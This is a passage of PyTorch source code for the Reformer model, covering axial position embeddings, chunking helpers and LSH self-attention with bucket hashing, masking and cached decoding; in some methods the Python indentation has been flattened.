    """

    def __init__(self, config):
        super().__init__()
        self.axial_pos_shape = config.axial_pos_shape
        self.axial_pos_embds_dim = config.axial_pos_embds_dim
        self.dropout = config.hidden_dropout_prob

        self.least_common_mult_chunk_length = _get_least_common_mult_chunk_len(config)
        self.weights = nn.ParameterList()

        assert (
            sum(self.axial_pos_embds_dim) == config.hidden_size
        ), "Make sure that config.axial_pos_embds factors: {} sum to config.hidden_size: {}".format(
            self.axial_pos_embds_dim, config.hidden_size
        )

        # create weights
        for axis, axial_pos_embd_dim in enumerate(self.axial_pos_embds_dim):
            # create expanded shapes
            # weight for axis k has shape (1, ..., axial_pos_shape[k], ..., 1, dim_k)
            ax_shape = [1] * len(self.axial_pos_shape)
            ax_shape[axis] = self.axial_pos_shape[axis]
            ax_shape = tuple(ax_shape) + (axial_pos_embd_dim,)

            # create tensor and init
            self.weights.append(nn.Parameter(torch.ones(ax_shape, dtype=torch.float32)))

    def forward(self, position_ids):
        """Return position encodings of shape (batch, seq_len, hidden_size)
        for the given ``position_ids`` of shape (batch, seq_len)."""
        # broadcast weights to correct shape
        batch_size = position_ids.shape[0]
        sequence_length = position_ids.shape[1]

        broadcasted_weights = [
            weight.expand((batch_size,) + self.axial_pos_shape + weight.shape[-1:]) for weight in self.weights
        ]

        if self.training is True:
            # In training the sequence must tile the full axial grid exactly.
            assert (
                reduce(mul, self.axial_pos_shape) == sequence_length
            ), "If training, make sure that config.axial_pos_shape factors: {} multiply to sequence length. Got prod({}) != sequence_length: {}. You might want to consider padding your sequence length to {} or changing config.axial_pos_shape.".format(
                self.axial_pos_shape, self.axial_pos_shape, sequence_length, reduce(mul, self.axial_pos_shape)
            )
            if self.dropout > 0:
                weights = torch.cat(broadcasted_weights, dim=-1)
                # permute weights so that 2D correctly drops dims 1 and 2
                transposed_weights = weights.transpose(2, 1)
                # drop entire matrix of last two dims (prev dims 1 and 2)
                dropped_transposed_weights = nn.functional.dropout2d(
                    transposed_weights, p=self.dropout, training=self.training
                )
                dropped_weights = dropped_transposed_weights.transpose(2, 1)

                position_encodings = torch.reshape(dropped_weights, (batch_size, sequence_length, -1))

            else:
                position_encodings = torch.cat(
                    [torch.reshape(weight, (batch_size, sequence_length, -1)) for weight in broadcasted_weights],
                    dim=-1,
                )

        else:
            # At inference the sequence may be shorter than the axial grid;
            # only the needed leading columns are materialised.
            assert (
                reduce(mul, self.axial_pos_shape) >= sequence_length
            ), "Make sure that config.axial_pos_shape factors: {} multiply at least to max(sequence_length, least_common_mult_chunk_length): max({}, {})".format(
                self.axial_pos_shape, sequence_length, self.least_common_mult_chunk_length,
            )

            # compute how many columns are needed (ceil division)
            max_position_id = position_ids.max().item()
            required_pos_encodings_columns = -(-(max_position_id + 1) // self.axial_pos_shape[1])

            # cut to columns that are needed
            position_encodings = torch.cat(
                [weight[:, :required_pos_encodings_columns] for weight in broadcasted_weights], dim=-1
            )
            position_encodings = torch.reshape(position_encodings, (batch_size, -1, position_encodings.shape[-1]))

            # select correct position encodings
            position_encodings = torch.cat(
                [
                    torch.index_select(position_encodings[i], 0, position_ids[i]).unsqueeze(0)
                    for i in range(batch_size)
                ],
                dim=0,
            )

        return position_encodings
class PositionEmbeddings(nn.Module):
    """Conventional learned position embeddings of shape
    `[max_pos_embeddings, hidden_size]`, with dropout applied on lookup.
    """

    def __init__(self, config):
        super().__init__()
        self.dropout = config.hidden_dropout_prob
        self.embedding = nn.Embedding(config.max_position_embeddings, config.hidden_size)

    def forward(self, position_ids):
        embedded_positions = self.embedding(position_ids)
        return nn.functional.dropout(embedded_positions, p=self.dropout, training=self.training)
class ReformerEmbeddings(nn.Module):
    """Construct the embeddings from word, position and token_type embeddings.
    """

    def __init__(self, config):
        super().__init__()
        self.max_position_embeddings = config.max_position_embeddings
        self.dropout = config.hidden_dropout_prob

        self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size)
        # axial (factorised) position embeddings save memory on very long
        # sequences; otherwise fall back to conventional learned positions
        self.position_embeddings = (
            AxialPositionEmbeddings(config) if config.axial_pos_embds else PositionEmbeddings(config)
        )

    def forward(self, input_ids=None, position_ids=None, inputs_embeds=None, start_idx_pos_encodings=0):
        """Embed ``input_ids`` (or use ``inputs_embeds`` directly) and add
        position embeddings starting at ``start_idx_pos_encodings`` (non-zero
        when continuing generation from cached states)."""
        if input_ids is not None:
            input_shape = input_ids.size()
            device = input_ids.device
        else:
            input_shape = inputs_embeds.size()[:-1]
            device = inputs_embeds.device

        seq_length = input_shape[1]
        if position_ids is None:
            # default: consecutive positions offset by start_idx_pos_encodings
            position_ids = torch.arange(
                start_idx_pos_encodings, start_idx_pos_encodings + seq_length, dtype=torch.long, device=device
            )
            position_ids = position_ids.unsqueeze(0).expand(input_shape)

        if inputs_embeds is None:
            inputs_embeds = self.word_embeddings(input_ids)

        assert (
            position_ids.shape[-1] <= self.max_position_embeddings
        ), "Sequence Length: {} has to be larger equal than config.max_position_embeddings: {}".format(
            position_ids.shape[-1], self.max_position_embeddings
        )

        # dropout
        embeddings = nn.functional.dropout(inputs_embeds, p=self.dropout, training=self.training)

        # add positional embeddings
        position_embeddings = self.position_embeddings(position_ids)
        embeddings = embeddings + position_embeddings
        return embeddings
class EfficientAttentionMixin:
    """
    A few utilities for nn.Modules in Reformer, to be used as a mixin.
    """

    def _look_adjacent(self, vectors, num_chunks_before, num_chunks_after):
        """ Used to implement attention between consecutive chunks.

            Args:
                vectors: array of shape [batch_size, num_attention_heads, n_chunks, chunk_len, ...]
                num_chunks_before: chunks before current chunk to include in attention
                num_chunks_after: chunks after current chunk to include in attention

            Returns:
                tensor of shape [num_chunks, N * chunk_length, ...], where
                N = (1 + num_chunks_before + num_chunks_after).
        """
        if num_chunks_before == 0 and num_chunks_after == 0:
            return vectors

        rotated_views = []
        for shift in range(-num_chunks_before, num_chunks_after + 1):
            if shift == 0:
                rotated_views.append(vectors)
            else:
                # rotate the chunk dimension by `shift` positions
                rotated = torch.cat([vectors[:, :, shift:, ...], vectors[:, :, :shift, ...]], dim=2)
                rotated_views.append(rotated)
        return torch.cat(rotated_views, dim=3)

    def _split_hidden_size_dim(self, x, num_attn_heads, attn_head_size):
        """
        splits hidden_size dim into attn_head_size and num_attn_heads
        """
        per_head_shape = x.size()[:-1] + (num_attn_heads, attn_head_size)
        reshaped = x.view(*per_head_shape)
        return reshaped.transpose(2, 1)

    def _merge_hidden_size_dims(self, x, num_attn_heads, attn_head_size):
        """
        merges attn_head_size dim and num_attn_heads dim into hidden_size
        """
        head_last = x.permute(0, 2, 1, 3)
        merged_shape = (head_last.size()[0], -1, num_attn_heads * attn_head_size)
        return torch.reshape(head_last, merged_shape)

    def _split_seq_length_dim_to(self, vectors, dim_factor_1, dim_factor_2, num_attn_heads, attn_head_size=None):
        """
        splits sequence length dim of vectors into `dim_factor_1` and `dim_factor_2` dims
        """
        batch_size = vectors.shape[0]
        leading_shape = (batch_size, num_attn_heads, dim_factor_1, dim_factor_2)

        rank = len(vectors.shape)
        if rank == 4:
            return torch.reshape(vectors, leading_shape + (attn_head_size,))
        if rank == 3:
            return torch.reshape(vectors, leading_shape)
        raise ValueError("Input vector rank should be one of [3, 4], but is: {}".format(len(vectors.shape)))
class LSHSelfAttention(nn.Module, EfficientAttentionMixin):
def __init__(self, config):
super().__init__()
self.config = config
self.chunk_length = config.lsh_attn_chunk_length
self.num_hashes = config.num_hashes
self.num_buckets = config.num_buckets
self.num_chunks_before = config.lsh_num_chunks_before
self.num_chunks_after = config.lsh_num_chunks_after
self.hash_seed = config.hash_seed
self.is_decoder = config.is_decoder
self.max_position_embeddings = config.max_position_embeddings
self.dropout = config.lsh_attention_probs_dropout_prob
self.num_attention_heads = config.num_attention_heads
self.attention_head_size = config.attention_head_size
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.hidden_size = config.hidden_size
# projection matrices
self.query_key = nn.Linear(self.hidden_size, self.all_head_size, bias=False)
self.value = nn.Linear(self.hidden_size, self.all_head_size, bias=False)
# save mask value here. Need fp32 and fp16 mask values
self.register_buffer("self_mask_value_float16", torch.tensor(-1e3))
self.register_buffer("self_mask_value_float32", torch.tensor(-1e5))
self.register_buffer("mask_value_float16", torch.tensor(-1e4))
self.register_buffer("mask_value_float32", torch.tensor(-1e9))
    def forward(
        self,
        hidden_states,
        attention_mask=None,
        head_mask=None,
        num_hashes=None,
        buckets=None,
        past_buckets_states=None,
        use_cache=False,
        output_attentions=False,
        **kwargs
    ):
        """
        Compute LSH self-attention over `hidden_states`.

        Three execution modes are visible below:
          * standard O(n^2) self-attention when the sequence fits into a single
            chunk,
          * chunked LSH attention with `num_hashes` hashing rounds otherwise,
          * cached single-token attention during auto-regressive generation
            (`use_cache=True` with `past_buckets_states[1]` already populated).

        Returns an `LSHSelfAttentionOutput` with the attended hidden states,
        the attention probabilities (empty tuple unless
        `output_attentions=True`) and the buckets used (for caching/backward).
        """
        sequence_length = hidden_states.shape[1]
        batch_size = hidden_states.shape[0]
        # num hashes can optionally be overwritten by user
        num_hashes = num_hashes if num_hashes is not None else self.num_hashes
        do_cached_attention = use_cache and past_buckets_states[1] is not None
        # check if cache shall be used and that hidden states are already cached
        if do_cached_attention:
            assert (
                sequence_length == 1
            ), f"At the moment, auto-regressive language generation is only possible one word at a time. Make sure that input sequence length {sequence_length} equals 1, when `past_buckets_states` is passed."
            past_buckets = past_buckets_states[0]
            past_states = past_buckets_states[1]
            # get query vector
            query_vectors = self.query_key(hidden_states)
            query_vectors = self._split_hidden_size_dim(
                query_vectors, self.num_attention_heads, self.attention_head_size
            )
            if past_buckets is not None:
                # cached buckets exist => only re-attend over the hidden states
                # that fall into the query's buckets (and adjacent chunks)
                key_value_hidden_states, sorted_bucket_idx, buckets = self._get_relevant_hid_states_and_buckets(
                    query_vectors=query_vectors,
                    attention_mask=attention_mask,
                    num_hashes=num_hashes,
                    hidden_states=hidden_states,
                    past_states=past_states,
                    past_buckets=past_buckets,
                )
                query_key_vectors = self._query_per_attn_head(key_value_hidden_states)
                value_vectors = self._value_per_attn_head(key_value_hidden_states)
                # split key & value vectors by num hashes to apply
                # self attention on each separately
                query_key_vectors = self._split_seq_length_dim_to(
                    query_key_vectors, num_hashes, -1, self.num_attention_heads, self.attention_head_size,
                )
                value_vectors = self._split_seq_length_dim_to(
                    value_vectors, num_hashes, -1, self.num_attention_heads, self.attention_head_size,
                )
                # repeat query vectors across hash dimension
                query_vectors = query_vectors.unsqueeze(2).repeat(1, 1, num_hashes, 1, 1)
            else:
                key_value_hidden_states = torch.cat([past_states, hidden_states], dim=1)
                query_key_vectors = self.query_key(key_value_hidden_states)
                value_vectors = self.value(key_value_hidden_states)
        else:
            # project hidden_states to query_key and value
            query_vectors = None
            query_key_vectors = self.query_key(hidden_states)
            value_vectors = self.value(hidden_states)
        # if query key is not already split
        if not do_cached_attention or past_buckets is None:
            query_key_vectors = self._split_hidden_size_dim(
                query_key_vectors, self.num_attention_heads, self.attention_head_size
            )
            value_vectors = self._split_hidden_size_dim(
                value_vectors, self.num_attention_heads, self.attention_head_size
            )
        # cache buckets for next incremental decoding
        if do_cached_attention and past_buckets is None and key_value_hidden_states.shape[1] >= self.chunk_length:
            buckets = self._hash_vectors(query_key_vectors, num_hashes, attention_mask)
        # free memory
        del hidden_states
        assert (
            query_key_vectors.shape[-1] == self.attention_head_size
        ), "last dim of query_key_vectors is {} but should be {}.".format(
            query_key_vectors.shape[-1], self.attention_head_size
        )
        assert (
            value_vectors.shape[-1] == self.attention_head_size
        ), "last dim of value_vectors is {} but should be {}.".format(
            value_vectors.shape[-1], self.attention_head_size
        )
        # fall back to full quadratic attention when the sequence fits into one
        # chunk or when decoding from the cache one token at a time
        do_standard_self_attention = (sequence_length <= self.chunk_length) or (
            use_cache and past_buckets_states[1] is not None
        )
        # LSH attention only makes sense if chunked attention should be performed
        if not do_standard_self_attention:
            # set `num_buckets` on the fly, recommended way to do it
            if self.num_buckets is None:
                self._set_num_buckets(sequence_length)
            # use cached buckets for backprop only
            if buckets is None:
                # hash query key vectors into buckets
                buckets = self._hash_vectors(query_key_vectors, num_hashes, attention_mask)
            else:
                # make sure buckets has correct shape for LSH attention
                buckets = buckets.view(batch_size, self.num_attention_heads, num_hashes * sequence_length)
            assert (
                int(buckets.shape[-1]) == num_hashes * sequence_length
            ), "last dim of buckets is {}, but should be {}".format(buckets.shape[-1], num_hashes * sequence_length)
            sorted_bucket_idx, undo_sorted_bucket_idx = self._get_sorted_bucket_idx_and_undo_sorted_bucket_idx(
                sequence_length, buckets, num_hashes
            )
            # make sure bucket idx is not longer then sequence length
            sorted_bucket_idx_per_hash = sorted_bucket_idx % sequence_length
            # cluster query key value vectors according to hashed buckets
            query_key_vectors = self._gather_by_expansion(query_key_vectors, sorted_bucket_idx_per_hash, num_hashes)
            value_vectors = self._gather_by_expansion(value_vectors, sorted_bucket_idx_per_hash, num_hashes)
            query_key_vectors = self._split_seq_length_dim_to(
                query_key_vectors, -1, self.chunk_length, self.num_attention_heads, self.attention_head_size,
            )
            value_vectors = self._split_seq_length_dim_to(
                value_vectors, -1, self.chunk_length, self.num_attention_heads, self.attention_head_size,
            )
            if self.chunk_length is None:
                assert (
                    self.num_chunks_before == 0 and self.num_chunks_after == 0
                ), "If `config.chunk_length` is `None`, make sure `config.num_chunks_after` and `config.num_chunks_before` are set to 0."
        elif do_cached_attention and past_buckets is not None:
            # use max sequence length
            sorted_bucket_idx_per_hash = sorted_bucket_idx
        else:
            # get sequence length indices
            sorted_bucket_idx_per_hash = torch.arange(sequence_length, device=query_key_vectors.device).repeat(
                batch_size, self.num_attention_heads, 1
            )
        # scale key vectors
        key_vectors = self._len_and_dim_norm(query_key_vectors)
        # set query_vectors to query key vectors if LSH self attention
        query_vectors = query_vectors if query_vectors is not None else query_key_vectors
        # free memory
        del query_key_vectors
        # get attention probs
        out_vectors, logits, attention_probs = self._attend(
            query_vectors=query_vectors,
            key_vectors=key_vectors,
            value_vectors=value_vectors,
            sorted_bucket_idx_per_hash=sorted_bucket_idx_per_hash,
            attention_mask=attention_mask,
            head_mask=head_mask,
            do_standard_self_attention=do_standard_self_attention,
            do_cached_attention=do_cached_attention,
        )
        # free memory
        del key_vectors, value_vectors
        # re-order out_vectors and logits
        if not do_standard_self_attention:
            # sort clusters back to correct ordering
            out_vectors, logits = ReverseSort.apply(out_vectors, logits, sorted_bucket_idx, undo_sorted_bucket_idx)
        if not do_standard_self_attention or (do_cached_attention and past_buckets is not None):
            # sum up all hash rounds
            if num_hashes > 1:
                out_vectors = self._split_seq_length_dim_to(
                    out_vectors, num_hashes, sequence_length, self.num_attention_heads, self.attention_head_size,
                )
                logits = self._split_seq_length_dim_to(
                    logits, num_hashes, sequence_length, self.num_attention_heads, self.attention_head_size,
                ).unsqueeze(-1)
                # softmax-weight the per-hash outputs by their logsumexp logits
                probs_vectors = torch.exp(logits - torch.logsumexp(logits, dim=2, keepdim=True))
                out_vectors = torch.sum(out_vectors * probs_vectors, dim=2)
                # free memory
                del probs_vectors
            # free memory
            del logits
        assert out_vectors.shape == (
            batch_size,
            self.num_attention_heads,
            sequence_length,
            self.attention_head_size,
        ), "out_vectors have be of shape `[batch_size, config.num_attention_heads, sequence_length, config.attention_head_size]`."
        out_vectors = self._merge_hidden_size_dims(out_vectors, self.num_attention_heads, self.attention_head_size)
        if output_attentions is False:
            attention_probs = ()
        if buckets is not None:
            buckets = buckets.view(batch_size, self.num_attention_heads, num_hashes, -1)
        return LSHSelfAttentionOutput(hidden_states=out_vectors, attention_probs=attention_probs, buckets=buckets)
def _query_per_attn_head(self, hidden_states):
per_head_query_key = self.query_key.weight.reshape(
self.num_attention_heads, self.attention_head_size, self.hidden_size
).transpose(-2, -1)
# only relevant for inference and no bias => we can use einsum here
query_key_vectors = torch.einsum("balh,ahr->balr", hidden_states, per_head_query_key)
return query_key_vectors
def _value_per_attn_head(self, hidden_states):
per_head_value = self.value.weight.reshape(
self.num_attention_heads, self.attention_head_size, self.hidden_size
).transpose(-2, -1)
# only relevant for inference and no bias => we can use einsum here
value_vectors = torch.einsum("balh,ahr->balr", hidden_states, per_head_value)
return value_vectors
def _hash_vectors(self, vectors, num_hashes, attention_mask, increase_num_buckets=False):
batch_size = vectors.shape[0]
# See https://arxiv.org/pdf/1509.02897.pdf
# We sample a different random rotation for each round of hashing to
# decrease the probability of hash misses.
if isinstance(self.num_buckets, int):
assert (
self.num_buckets % 2 == 0
), "There should be an even number of bucktes, but `self.num_bucktes`: {}".format(self.num_buckets)
rotation_size = self.num_buckets
num_buckets = self.num_buckets
else:
# Factorize the hash if self.num_buckets is a list or tuple
rotation_size, num_buckets = 0, 1
for bucket_factor in self.num_buckets:
assert bucket_factor % 2 == 0, "The number of buckets should be even, but `num_bucket`: {}".format(
bucket_factor
)
rotation_size = rotation_size + bucket_factor
num_buckets = num_buckets * bucket_factor
# remove gradient
vectors = vectors.detach()
if self.hash_seed is not None:
# for determinism
torch.manual_seed(self.hash_seed)
rotations_shape = (self.num_attention_heads, vectors.shape[-1], num_hashes, rotation_size // 2)
# create a random self.attention_head_size x num_hashes x num_buckets/2
random_rotations = torch.randn(rotations_shape, device=vectors.device, dtype=vectors.dtype)
# Output dim: Batch_Size x Num_Attn_Heads x Num_Hashes x Seq_Len x Num_Buckets/2
rotated_vectors = torch.einsum("bmtd,mdhr->bmhtr", vectors, random_rotations)
if isinstance(self.num_buckets, int) or len(self.num_buckets) == 1:
rotated_vectors = torch.cat([rotated_vectors, -rotated_vectors], dim=-1)
buckets = torch.argmax(rotated_vectors, dim=-1)
else:
# Get the buckets for them and combine.
buckets, cur_sum, cur_product = None, 0, 1
for bucket_factor in self.num_buckets:
rotated_vectors_factor = rotated_vectors[..., cur_sum : cur_sum + (bucket_factor // 2)]
cur_sum = cur_sum + bucket_factor // 2
rotated_vectors_factor = torch.cat([rotated_vectors_factor, -rotated_vectors_factor], dim=-1)
if buckets is None:
buckets = torch.argmax(rotated_vectors_factor, dim=-1)
else:
buckets = buckets + (cur_product * torch.argmax(rotated_vectors_factor, dim=-1))
cur_product = cur_product * bucket_factor
if attention_mask is not None and (attention_mask.sum().item() < batch_size * attention_mask.shape[-1]):
# add an extra bucket for padding tokens only
num_buckets = num_buckets + 1
# assign padding tokens extra bucket
buckets_mask = attention_mask.to(torch.uint8)[:, None, None, :].expand(buckets.shape)
buckets = torch.where(
buckets_mask, buckets, torch.tensor(num_buckets - 1, dtype=torch.long, device=buckets.device)
)
elif increase_num_buckets:
num_buckets = num_buckets + 1
# buckets is now (Batch_size x Num_Attn_Heads x Num_Hashes x Seq_Len).
# Next we add offsets so that bucket numbers from different hashing rounds don't overlap.
offsets = torch.arange(num_hashes, device=vectors.device)
offsets = (offsets * num_buckets).view((1, 1, -1, 1))
# expand to batch size and num attention heads
offsets = offsets.expand((batch_size, self.num_attention_heads) + offsets.shape[-2:])
offset_buckets = (buckets + offsets).flatten(start_dim=2, end_dim=3)
return offset_buckets
def _get_sorted_bucket_idx_and_undo_sorted_bucket_idx(self, sequence_length, buckets, num_hashes):
# no gradients are needed
with torch.no_grad():
# hash-based sort
sorted_bucket_idx = _stable_argsort(buckets, dim=-1)
# create simple indices to scatter to, to have undo sort
indices = (
torch.arange(sorted_bucket_idx.shape[-1], device=buckets.device)
.view(1, 1, -1)
.expand(sorted_bucket_idx.shape)
)
# get undo sort
undo_sorted_bucket_idx = sorted_bucket_idx.new(*sorted_bucket_idx.size())
undo_sorted_bucket_idx.scatter_(-1, sorted_bucket_idx, indices)
return sorted_bucket_idx, undo_sorted_bucket_idx
def _set_num_buckets(self, sequence_length):
# `num_buckets` should be set to 2 * sequence_length // chunk_length as recommended in paper
num_buckets_pow_2 = (2 * (sequence_length // self.chunk_length)).bit_length() - 1
# make sure buckets are power of 2
num_buckets = 2 ** num_buckets_pow_2
# factorize `num_buckets` if `num_buckets` becomes too large
num_buckets_limit = 2 * max(
int((self.max_position_embeddings // self.chunk_length) ** (0.5)), self.chunk_length,
)
if num_buckets > num_buckets_limit:
num_buckets = [2 ** (num_buckets_pow_2 // 2), 2 ** (num_buckets_pow_2 - num_buckets_pow_2 // 2)]
logger.warning("config.num_buckets is not set. Setting config.num_buckets to {}...".format(num_buckets))
# set num buckets in config to be properly saved
self.config.num_buckets = num_buckets
self.num_buckets = num_buckets
    def _attend(
        self,
        query_vectors,
        key_vectors,
        value_vectors,
        sorted_bucket_idx_per_hash,
        attention_mask,
        head_mask,
        do_standard_self_attention,
        do_cached_attention,
    ):
        """
        Core attention computation shared by the standard, chunked-LSH and
        cached paths: compute query-key dots, apply padding/causal masks and
        the Reformer self-mask, softmax (via logsumexp), dropout, optional
        head masking, and attend over the values.

        Returns `(out_vectors, logits, attention_probs)` where `logits` are
        the per-position logsumexp values needed to combine hash rounds.
        """
        # look at previous and following chunks if chunked attention
        if not do_standard_self_attention:
            key_vectors = self._look_adjacent(key_vectors, self.num_chunks_before, self.num_chunks_after)
            value_vectors = self._look_adjacent(value_vectors, self.num_chunks_before, self.num_chunks_after)
        # get logits and dots
        # (BS, NumAttn, NumHash x NumChunk, Chunk_L x Hidden),(BS, NumAttn, NumHash x NumChunk, Chunk_L * (Num_bef + Num_aft + 1) x Hidden) -> (BS, NumAttn, NumHash x NumChunk, Chunk_L, Chunk_L * (1 + Num_bef + Num_aft))
        query_key_dots = torch.matmul(query_vectors, key_vectors.transpose(-1, -2))
        # free memory
        del query_vectors, key_vectors
        # if chunked attention split bucket idxs to query and key
        if not do_standard_self_attention:
            query_bucket_idx = self._split_seq_length_dim_to(
                sorted_bucket_idx_per_hash, -1, self.chunk_length, self.num_attention_heads
            )
            key_value_bucket_idx = self._look_adjacent(query_bucket_idx, self.num_chunks_before, self.num_chunks_after)
        elif do_cached_attention and query_key_dots.ndim > 4:
            key_value_bucket_idx = sorted_bucket_idx_per_hash
            # the single query token gets the maximum index so the causal mask lets it see all keys
            query_bucket_idx = (
                key_value_bucket_idx.new_ones(key_value_bucket_idx.shape[:-1] + (1,)) * key_value_bucket_idx.max()
            )
        elif do_cached_attention and query_key_dots.ndim <= 4:
            query_bucket_idx = (query_key_dots.shape[-1] - 1) * torch.ones_like(query_key_dots)[:, :, :, -1]
            key_value_bucket_idx = torch.arange(
                query_key_dots.shape[-1], dtype=torch.long, device=query_key_dots.device
            )[None, None, :].expand(query_bucket_idx.shape[:2] + (-1,))
        else:
            query_bucket_idx = key_value_bucket_idx = sorted_bucket_idx_per_hash
        # get correct mask values depending on precision
        if query_key_dots.dtype == torch.float16:
            self_mask_value = self.self_mask_value_float16.half()
            mask_value = self.mask_value_float16.half()
        else:
            self_mask_value = self.self_mask_value_float32
            mask_value = self.mask_value_float32
        if not do_cached_attention:
            mask = self._compute_attn_mask(
                query_bucket_idx,
                key_value_bucket_idx,
                attention_mask,
                query_key_dots.shape,
                do_standard_self_attention,
            )
            if mask is not None:
                query_key_dots = torch.where(mask, query_key_dots, mask_value)
            # free memory
            del mask
        # Self mask is ALWAYS applied.
        # From the reformer paper (https://arxiv.org/pdf/2001.04451.pdf):
        # " While attention to the future is not allowed, typical implementations of the
        # Transformer do allow a position to attend to itself.
        # Such behavior is undesirable in a shared-QK formulation because the dot-product
        # of a query vector with itself will almost always be greater than the dot product of a
        # query vector with a vector at another position. We therefore modify the masking
        # to forbid a token from attending to itself, except in situations
        # where a token has no other valid attention targets (e.g. the first token in a sequence) "
        self_mask = torch.ne(query_bucket_idx.unsqueeze(-1), key_value_bucket_idx.unsqueeze(-2)).to(
            query_bucket_idx.device
        )
        # apply self_mask
        query_key_dots = torch.where(self_mask, query_key_dots, self_mask_value)
        # free memory
        del self_mask
        logits = torch.logsumexp(query_key_dots, dim=-1, keepdim=True)
        # dots shape is `[batch_size, num_attn_heads, num_hashes * seq_len // chunk_length, chunk_length, chunk_length * (1 + num_chunks_before + num_chunks_after)]`
        attention_probs = torch.exp(query_key_dots - logits)
        # free memory
        del query_key_dots
        # dropout
        attention_probs = nn.functional.dropout(attention_probs, p=self.dropout, training=self.training)
        # Mask heads if we want to
        if head_mask is not None:
            attention_probs = attention_probs * head_mask
        # attend values
        out_vectors = torch.matmul(attention_probs, value_vectors)
        # free memory
        del value_vectors
        # merge chunk length
        if out_vectors.ndim > 4:
            logits = logits.flatten(start_dim=2, end_dim=3).squeeze(-1)
            out_vectors = out_vectors.flatten(start_dim=2, end_dim=3)
        return out_vectors, logits, attention_probs
def _compute_attn_mask(
self, query_indices, key_indices, attention_mask, query_key_dot_shape, do_standard_self_attention
):
# attention mask for LSH
if attention_mask is not None:
# if chunked attention, the attention mask has to correspond to LSH order
attention_mask = attention_mask.to(torch.uint8)[:, None, :]
if not do_standard_self_attention:
# expand attn_mask to fit with key_value_bucket_idx shape
attention_mask = attention_mask[:, None, :]
attention_mask = attention_mask.expand(query_indices.shape[:-1] + (-1,))
# extract attention mask from LSH sorted key_indices
attention_mask = torch.gather(attention_mask, -1, key_indices)
attention_mask = attention_mask.unsqueeze(-2).expand(query_key_dot_shape)
# Causal mask
if self.is_decoder is True:
causal_mask = torch.ge(query_indices.unsqueeze(-1), key_indices.unsqueeze(-2)).to(query_indices.device)
# add attention mask if not None
if attention_mask is not None:
attention_mask = causal_mask * attention_mask
else:
attention_mask = causal_mask
return attention_mask
    def _get_relevant_hid_states_and_buckets(
        self, query_vectors, attention_mask, num_hashes, hidden_states, past_states, past_buckets
    ):
        """
        During cached single-token decoding: hash the new query, sort it into
        the cached buckets, and gather only the hidden states belonging to the
        query's chunks (plus configured adjacent chunks) for re-attention.

        Returns `(relevant_hidden_states, relevant_bucket_idx_chunk,
        query_buckets)`.
        """
        # concat hidden states
        hidden_states = torch.cat([past_states, hidden_states], dim=1)
        # batch_size hidden
        batch_size = hidden_states.shape[0]
        sequence_length = hidden_states.shape[1]
        # check if cached buckets include pad bucket
        max_bucket = self.num_buckets if isinstance(self.num_buckets, int) else reduce(mul, self.num_buckets)
        # if pad bucket was cached => need to increase num buckets for caching
        increase_num_buckets = past_buckets.max() > num_hashes * max_bucket - 1
        # retrieve query buckets
        query_buckets = self._hash_vectors(
            query_vectors, num_hashes, attention_mask, increase_num_buckets=increase_num_buckets
        )
        # concat buckets
        concat_buckets = torch.cat([past_buckets, query_buckets.unsqueeze(-1)], dim=-1)
        # hash-based sort
        bucket_idx = _stable_argsort(concat_buckets, dim=-1)
        # bucket_idx has shape: BatchSize x NumAttnHeads x NumHashes x SequenceLength
        assert bucket_idx.shape == (
            batch_size,
            self.num_attention_heads,
            num_hashes,
            sequence_length,
        ), f"bucket_idx should have shape {(batch_size, self.num_attention_heads, num_hashes, sequence_length)}, but has shape {bucket_idx.shape}."
        # find indices of new bucket indices
        # (the query token is the last concatenated position => index seq_len - 1)
        relevant_bucket_idx = (bucket_idx == (bucket_idx.shape[-1] - 1)).nonzero()
        # expand relevant bucket indices to its chunks
        relevant_bucket_idx_chunk = self._expand_to_indices_in_relevant_chunk(relevant_bucket_idx, sequence_length)
        relevant_bucket_idx_chunk = bucket_idx[tuple(relevant_bucket_idx_chunk.transpose(0, 1))]
        # adapt bucket_idx for batch and hidden states for index select
        bucket_idx_batch_offset = sequence_length * (
            batch_size
            * torch.arange(relevant_bucket_idx_chunk.shape[-1], device=hidden_states.device, dtype=torch.long)
            // relevant_bucket_idx_chunk.shape[-1]
        )
        # add batch offset
        relevant_bucket_idx_chunk_all_batch = relevant_bucket_idx_chunk + bucket_idx_batch_offset
        hidden_states = hidden_states.reshape((-1, self.hidden_size))
        # select all relevant hidden states
        relevant_hidden_states = hidden_states.index_select(0, relevant_bucket_idx_chunk_all_batch)
        # reshape hidden states and bucket_idx to correct output
        relevant_hidden_states = relevant_hidden_states.reshape(
            batch_size, self.num_attention_heads, -1, self.hidden_size
        )
        relevant_bucket_idx_chunk = relevant_bucket_idx_chunk.reshape(
            batch_size, self.num_attention_heads, num_hashes, -1
        )
        assert (
            relevant_hidden_states.shape[2]
            == (self.num_chunks_before + self.num_chunks_after + 1) * self.chunk_length * num_hashes
        ), f"There should be {(self.num_chunks_before + self.num_chunks_after + 1) * self.chunk_length * num_hashes} `hidden_states`, there are {relevant_hidden_states.shape[2]} `hidden_states`."
        assert (
            relevant_bucket_idx_chunk.shape[-1]
            == (self.num_chunks_before + self.num_chunks_after + 1) * self.chunk_length
        ), f"There should be {(self.num_chunks_before + self.num_chunks_after + 1) * self.chunk_length} `hidden_states`, there are {relevant_bucket_idx_chunk.shape[-1]} `bucket_idx`."
        return relevant_hidden_states, relevant_bucket_idx_chunk, query_buckets
def _expand_to_indices_in_relevant_chunk(self, indices, sequence_length):
# get relevant indices of where chunk starts and its size
start_indices_chunk = ((indices[:, -1] // self.chunk_length) - self.num_chunks_before) * self.chunk_length
total_chunk_size = self.chunk_length * (1 + self.num_chunks_before + self.num_chunks_after)
# expand start indices and add correct chunk offset via arange
expanded_start_indices = start_indices_chunk.unsqueeze(-1).expand(indices.shape[0], total_chunk_size)
chunk_sequence_indices = expanded_start_indices + torch.arange(
total_chunk_size, device=indices.device, dtype=torch.long
).unsqueeze(0).expand(indices.shape[0], total_chunk_size)
# make sure that circular logic holds via % seq len
chunk_sequence_indices = chunk_sequence_indices.flatten() % sequence_length
# expand indices and set indices correctly
indices = indices.unsqueeze(1).expand((indices.shape[0], total_chunk_size, -1)).flatten(0, 1).clone()
indices[:, -1] = chunk_sequence_indices
return indices
def _len_and_dim_norm(self, vectors):
"""
length and attention head size dim normalization
"""
vectors = self._len_norm(vectors)
vectors = vectors * torch.rsqrt(
torch.tensor(self.attention_head_size, device=vectors.device, dtype=vectors.dtype)
)
return vectors
def _len_norm(self, x, epsilon=1e-6):
"""
length normalization
"""
variance = torch.mean(x ** 2, -1, keepdim=True)
